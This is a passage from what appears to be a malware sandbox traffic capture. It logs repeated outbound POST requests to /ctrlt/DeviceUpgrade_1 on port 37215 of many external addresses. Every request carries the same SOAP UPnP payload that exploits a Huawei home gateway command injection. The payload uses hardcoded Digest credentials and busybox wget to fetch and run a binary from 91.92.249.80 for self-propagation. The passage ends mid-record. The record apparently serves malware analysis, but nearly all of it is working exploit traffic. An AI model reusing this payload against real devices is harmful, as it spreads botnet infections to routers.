                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          37192.168.2.235721841.152.77.4737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102819920 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          38192.168.2.2356740197.115.50.21937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102832079 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          39192.168.2.233528641.249.66.23137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102832079 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          40192.168.2.2358310204.143.20.7037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102832079 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          41192.168.2.2339822202.213.139.7237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102946043 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          42192.168.2.2355990156.140.83.437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102957964 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          43192.168.2.233723241.69.250.22637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102960110 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          44192.168.2.233907441.192.243.7137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102962017 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          45192.168.2.2344464217.81.237.13337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102962017 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          46192.168.2.235676441.1.165.8137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102967978 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          47192.168.2.2358250197.199.21.5537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102987051 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
